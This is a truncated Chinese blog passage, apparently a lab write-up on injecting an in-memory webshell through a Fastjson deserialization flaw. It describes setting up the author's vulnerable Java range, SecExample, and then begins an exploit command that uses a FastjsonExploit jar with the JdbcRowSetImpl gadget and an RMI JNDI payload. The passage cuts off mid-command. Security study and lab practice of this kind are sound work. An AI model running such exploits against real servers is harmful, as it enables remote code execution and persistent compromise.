实战|利用 Fastjson注入内存马

前言起因是因为工位旁边的“帅比”同事写内存马的时候挠头搞环境，实在看不下去了。让他用我的靶机他就是不听。直接拿我之前写的漏洞靶场演示一波。欢迎大家来star一下https://github.com/tangxiaofeng7/SecExample靶场JAVA 漏洞靶场-SecExample效果图：我直接导入idea.本地开启mysql服务，然后将mysql目录下的init.sql文件导入。同时修改resources目录下的application.yml文件，使数据库生效。url: jdbc:mysql://localhost:3306/mybatis?serverTimezone=UTC&useSSL=false#url: jdbc:mysql://mysql-db:3306/mybatis?serverTimezone=UTC&useSSL=false&allowPublicKeyRetrieval=true记得数据的账号密码修改成本地一下。最后启动应用。效果图：利用使用利用工具java -jar FastjsonExploit-0.1-beta2-all.jar JdbcRowSetImpl5 rmi://127.0.0.1:1099/Exploit "cmd:open /System/Appl ………………………………